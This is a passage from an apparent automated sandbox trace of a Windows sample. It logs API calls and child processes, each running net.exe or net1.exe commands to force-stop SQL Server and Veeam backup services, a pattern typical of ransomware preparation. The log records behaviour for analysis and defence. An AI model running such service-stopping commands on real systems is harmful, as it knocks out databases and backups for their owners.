(_String1="files", _String2="MSSQL$TPS") returned -7 [0104.407] _wcsicmp (_String1="group", _String2="MSSQL$TPS") returned -6 [0104.407] _wcsicmp (_String1="groups", _String2="MSSQL$TPS") returned -6 [0104.407] _wcsicmp (_String1="help", _String2="MSSQL$TPS") returned -5 [0104.407] _wcsicmp (_String1="helpmsg", _String2="MSSQL$TPS") returned -5 [0104.407] _wcsicmp (_String1="localgroup", _String2="MSSQL$TPS") returned -1 [0104.407] _wcsicmp (_String1="pause", _String2="MSSQL$TPS") returned 3 [0104.407] _wcsicmp (_String1="session", _String2="MSSQL$TPS") returned 6 [0104.407] _wcsicmp (_String1="sessions", _String2="MSSQL$TPS") returned 6 [0104.407] _wcsicmp (_String1="sess", _String2="MSSQL$TPS") returned 6 [0104.407] _wcsicmp (_String1="share", _String2="MSSQL$TPS") returned 6 [0104.407] _wcsicmp (_String1="start", _String2="MSSQL$TPS") returned 6 [0104.407] _wcsicmp (_String1="stats", _String2="MSSQL$TPS") returned 6 [0104.407] _wcsicmp (_String1="statistics", _String2="MSSQL$TPS") returned 6 [0104.407] _wcsicmp (_String1="stop", _String2="MSSQL$TPS") returned 6 [0104.407] _wcsicmp (_String1="time", _String2="MSSQL$TPS") returned 7 [0104.407] _wcsicmp (_String1="user", _String2="MSSQL$TPS") returned 8 [0104.407] _wcsicmp (_String1="users", _String2="MSSQL$TPS") returned 8 [0104.407] _wcsicmp (_String1="msg", _String2="MSSQL$TPS") returned -12 [0104.407] _wcsicmp (_String1="messenger", _String2="MSSQL$TPS") returned -14 [0104.407] _wcsicmp (_String1="receiver", _String2="MSSQL$TPS") returned 5 [0104.407] _wcsicmp (_String1="rcv", _String2="MSSQL$TPS") returned 5 [0104.407] _wcsicmp (_String1="netpopup", _String2="MSSQL$TPS") returned 1 [0104.407] _wcsicmp (_String1="redirector", _String2="MSSQL$TPS") returned 5 [0104.407] _wcsicmp (_String1="redir", _String2="MSSQL$TPS") returned 5 [0104.407] _wcsicmp (_String1="rdr", _String2="MSSQL$TPS") returned 5 [0104.407] _wcsicmp (_String1="workstation", _String2="MSSQL$TPS") returned 10 [0104.407] _wcsicmp (_String1="work", _String2="MSSQL$TPS") returned 10 [0104.407] _wcsicmp (_String1="wksta", _String2="MSSQL$TPS") returned 10 [0104.407] _wcsicmp (_String1="prdr", _String2="MSSQL$TPS") returned 3 [0104.408] _wcsicmp (_String1="devrdr", _String2="MSSQL$TPS") returned -9 [0104.408] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQL$TPS") returned -1 [0104.408] _wcsicmp (_String1="server", _String2="MSSQL$TPS") returned 6 [0104.408] _wcsicmp (_String1="svr", _String2="MSSQL$TPS") returned 6 [0104.408] _wcsicmp (_String1="srv", _String2="MSSQL$TPS") returned 6 [0104.408] _wcsicmp (_String1="lanmanserver", _String2="MSSQL$TPS") returned -1 [0104.408] _wcsicmp (_String1="alerter", _String2="MSSQL$TPS") returned -12 [0104.408] _wcsicmp (_String1="netlogon", _String2="MSSQL$TPS") returned 1 [0104.408] _wcsupr (in: _String="MSSQL$TPS" | out: _String="MSSQL$TPS") returned="MSSQL$TPS" [0104.408] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x9ce00 [0104.413] GetServiceKeyNameW (in: hSCManager=0x9ce00, lpDisplayName="MSSQL$TPS", lpServiceName=0xff6f5750, lpcchBuffer=0x24f728 | out: lpServiceName="", lpcchBuffer=0x24f728) returned 0 [0104.414] _wcsicmp (_String1="msg", _String2="MSSQL$TPS") returned -12 [0104.414] _wcsicmp (_String1="messenger", _String2="MSSQL$TPS") returned -14 [0104.414] _wcsicmp (_String1="receiver", _String2="MSSQL$TPS") returned 5 [0104.414] _wcsicmp (_String1="rcv", _String2="MSSQL$TPS") returned 5 [0104.414] _wcsicmp (_String1="redirector", _String2="MSSQL$TPS") returned 5 [0104.414] _wcsicmp (_String1="redir", _String2="MSSQL$TPS") returned 5 [0104.414] _wcsicmp (_String1="rdr", _String2="MSSQL$TPS") returned 5 [0104.414] _wcsicmp (_String1="workstation", _String2="MSSQL$TPS") returned 10 [0104.414] _wcsicmp (_String1="work", _String2="MSSQL$TPS") returned 10 [0104.414] _wcsicmp (_String1="wksta", _String2="MSSQL$TPS") returned 10 [0104.414] _wcsicmp (_String1="prdr", _String2="MSSQL$TPS") returned 3 [0104.414] _wcsicmp (_String1="devrdr", _String2="MSSQL$TPS") returned -9 [0104.414] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQL$TPS") returned -1 [0104.414] _wcsicmp (_String1="server", _String2="MSSQL$TPS") returned 6 [0104.414] _wcsicmp (_String1="svr", _String2="MSSQL$TPS") returned 6 [0104.414] _wcsicmp (_String1="srv", _String2="MSSQL$TPS") returned 6 [0104.414] _wcsicmp (_String1="lanmanserver", _String2="MSSQL$TPS") returned -1 [0104.414] _wcsicmp (_String1="alerter", _String2="MSSQL$TPS") returned -12 [0104.414] _wcsicmp (_String1="netlogon", _String2="MSSQL$TPS") returned 1 [0104.414] NetServiceControl (in: servername=0x0, service="MSSQL$TPS", opcode=0x0, arg=0x0, bufptr=0x24f730 | out: bufptr=0x24f730) returned 0x889 [0104.415] wcscpy_s (in: _Destination=0xff6f80d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0104.415] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75290000 [0104.416] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75290000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xff6f5b50, nSize=0x800, Arguments=0xff6f7f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0104.418] GetFileType (hFile=0xb) returned 0x2 [0104.418] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x24f5f8 | out: lpMode=0x24f5f8) returned 1 [0104.418] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff6f5b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x24f5f0, lpReserved=0x0 | out: lpBuffer=0xff6f5b50*, lpNumberOfCharsWritten=0x24f5f0*=0x1e) returned 1 [0104.418] GetFileType (hFile=0xb) returned 0x2 [0104.419] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x24f5f8 | out: lpMode=0x24f5f8) returned 1 [0104.419] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff6d1efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x24f5f0, lpReserved=0x0 | out: lpBuffer=0xff6d1efc*, lpNumberOfCharsWritten=0x24f5f0*=0x2) returned 1 [0104.419] _ultow (in: _Dest=0x889, _Radix=2422368 | out: _Dest=0x889) returned="2185" [0104.419] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75290000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xff6f5b50, nSize=0x800, Arguments=0xff6f7f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0104.419] GetFileType (hFile=0xb) returned 0x2 [0104.420] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x24f5f8 | out: lpMode=0x24f5f8) returned 1 [0104.420] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff6f5b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x24f5f0, lpReserved=0x0 | out: lpBuffer=0xff6f5b50*, lpNumberOfCharsWritten=0x24f5f0*=0x34) returned 1 [0104.420] GetFileType (hFile=0xb) returned 0x2 [0104.420] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x24f5f8 | out: lpMode=0x24f5f8) returned 1 [0104.421] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff6d1efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x24f5f0, lpReserved=0x0 | out: lpBuffer=0xff6d1efc*, lpNumberOfCharsWritten=0x24f5f0*=0x2) returned 1 [0104.421] NetApiBufferFree (Buffer=0x94d50) returned 0x0 [0104.421] NetApiBufferFree (Buffer=0x9c0f0) returned 0x0 [0104.421] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQL$TPS /y" [0104.421] exit (_Code=2) Process: id = "198" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x5e105000" os_pid = "0x1368" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop MSSQL$VEEAMSQL2012 /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 7932 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 7933 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 7934 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 7935 start_va = 0x1b0000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 7936 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 7937 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 7938 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 7939 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 7940 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 7941 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 7942 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 7943 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 7944 start_va = 0x2d0000 end_va = 0x3cffff entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 7945 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 7946 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 646 os_tid = 0xd0c Process: id = "199" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x5cd25000" os_pid = "0x90c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop MSSQLFDLauncher /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 7998 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 7999 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 8000 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 8001 start_va = 0x50000 end_va = 0xcffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 8002 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 8003 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 8004 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 8005 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 8006 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 8007 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 8008 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 8009 start_va = 0x7fffffde000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 8010 start_va = 0x100000 end_va = 0x1fffff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 8011 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 8012 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 648 os_tid = 0x9c4 Process: id = "200" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x5b245000" os_pid = "0x9ec" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop MSSQLFDLauncher$PROFXENGAGEMENT /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 8033 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 8034 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 8035 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 8036 start_va = 0x170000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 8037 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 8038 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 8039 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 8040 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 8041 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 8042 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 8043 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 8044 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 8045 start_va = 0x2f0000 end_va = 0x3effff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 8046 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 8047 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 650 os_tid = 0x994 Process: id = "201" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x5cfff000" os_pid = "0x91c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "194" os_parent_pid = "0xa8c" cmd_line = "C:\\Windows\\system32\\net1 stop MSSQL$TPSAMA /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 8048 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 8049 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 8050 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 8051 start_va = 0x1d0000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 8052 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 8053 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 8054 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 8055 start_va = 0xff880000 end_va = 0xff8b2fff entry_point = 0xff880000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 8056 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 8057 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 8058 start_va = 0x7fffffd5000 end_va = 0x7fffffd5fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 8059 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 8060 start_va = 0x430000 end_va = 0x52ffff entry_point = 0x0 region_type = private name = "private_0x0000000000430000" filename = "" Region: id = 8061 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 8062 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 8063 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 8064 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 8065 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 8066 start_va = 0xd0000 end_va = 0xdffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 8067 start_va = 0x250000 end_va = 0x34ffff entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 8068 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 8069 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 8070 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 8071 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 8072 start_va = 0x7fefb6e0000 end_va = 0x7fefb6f1fff entry_point = 0x7fefb6e0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 8073 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 8074 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 8075 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 8076 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 8077 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 8078 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 8079 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 8080 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 8081 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 8082 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 8083 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 8084 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 8085 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 8139 start_va = 0x75290000 end_va = 0x75291fff entry_point = 0x75290000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 652 os_tid = 0x8e8 [0104.796] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x24f9b0 | out: lpSystemTimeAsFileTime=0x24f9b0*(dwLowDateTime=0xf39cb510, dwHighDateTime=0x1d48689)) [0104.796] GetCurrentProcessId () returned 0x91c [0104.796] GetCurrentThreadId () returned 0x8e8 [0104.796] GetTickCount () returned 0x23f21 [0104.796] QueryPerformanceCounter (in: lpPerformanceCount=0x24f9b8 | out: lpPerformanceCount=0x24f9b8*=1815171500000) returned 1 [0104.798] GetModuleHandleW (lpModuleName=0x0) returned 0xff880000 [0104.798] __set_app_type (_Type=0x1) [0104.798] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff899c9c) returned 0x0 [0104.798] __getmainargs (in: _Argc=0xff8a4780, _Argv=0xff8a4790, _Env=0xff8a4788, _DoWildCard=0, _StartInfo=0xff8a479c | out: _Argc=0xff8a4780, _Argv=0xff8a4790, _Env=0xff8a4788) returned 0 [0104.799] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0104.799] GetConsoleOutputCP () returned 0x1b5 [0104.860] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xff8acec0 | out: lpCPInfo=0xff8acec0) returned 1 [0104.860] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0104.862] sprintf_s (in: _DstBuf=0x24f958, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0104.862] setlocale (category=0, locale=".437") returned="English_United States.437" [0104.863] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0104.863] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0104.863] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQL$TPSAMA /y" [0104.864] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x24f6f0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0104.864] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 